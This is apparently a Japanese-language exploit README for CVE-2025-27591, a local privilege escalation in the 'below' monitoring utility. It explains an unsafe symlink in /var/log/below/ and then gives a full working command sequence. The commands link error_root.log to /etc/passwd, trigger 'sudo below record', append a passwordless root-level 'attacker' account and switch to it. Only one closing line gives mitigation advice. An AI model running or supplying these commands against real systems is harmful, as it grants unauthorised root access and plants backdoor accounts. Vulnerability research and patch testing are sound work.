
# CVE-2025-27591 用ローカル権限昇格エクスプロイト 下記ユーティリティのロギングにおける安全でないシンボリックリンク処理を悪用し、root として任意のファイルを上書きするローカル権限昇格エクスプロイトです。
CVE-2025-27591 は、below ユーティリティ(パッチ適用前のバージョン)におけるローカル権限昇格の脆弱性であり、そのログ記録メカニズム内の安全でないシンボリックリンク処理によって引き起こされます。ローカルアクセスを持つ攻撃者は、この欠陥を悪用して root ユーザーとして任意のファイルを上書きし、完全な権限昇格につなげることができます。
below ツールは、シンボリックリンクを適切に検証せずに /var/log/below/ にログを書き込みます。機密ファイル(例:/etc/passwd)を指すシンボリックリンクを事前に作成することで、攻撃者は脆弱なプロセスが sudo で実行された際に、昇格した権限で任意のコンテンツを注入できます。
# ログディレクトリが存在するか確認
test -d /var/log/below && ls -ld /var/log/below
# 既存のログファイルを削除し、悪意のあるシンボリックリンクを作成
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# 悪意のある passwd エントリを準備
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# sudo を使用して脆弱な動作をトリガー
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# 新しく作成された root 権限ユーザーに切り替え
su attacker
エクスプロイトが成功すると、ローカルの非特権攻撃者にroot 権限が付与され、システム全体の完全な侵害が可能になります。
/var/log/below/ ディレクトリへのアクセスを制限してください。